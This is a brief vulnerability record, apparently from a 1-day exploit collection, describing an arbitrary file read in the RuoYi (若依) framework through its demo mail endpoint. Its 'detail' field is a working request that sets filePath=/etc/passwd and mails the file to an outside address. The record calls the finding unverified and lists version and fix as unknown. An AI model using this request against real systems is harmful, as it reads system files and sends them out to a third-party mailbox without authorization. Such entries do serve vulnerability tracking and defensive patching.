vendor = "若依"
name = "若依任意⽂件读取"
type = "权限绕过"
version = "未知"
path = "/demo/mail/sendMessageWithAttachment /sendMessageWithAttachments"
detail = "/demo/mail/sendMessageWithAttachment?to=xxxxxx@163.com&subject=Test-Mail&text=This%20is%20a%20test%20message&filePath=/etc/passwd"
fix = "未知"
date = "0703"
label = "1day"
verifier = "未验真"
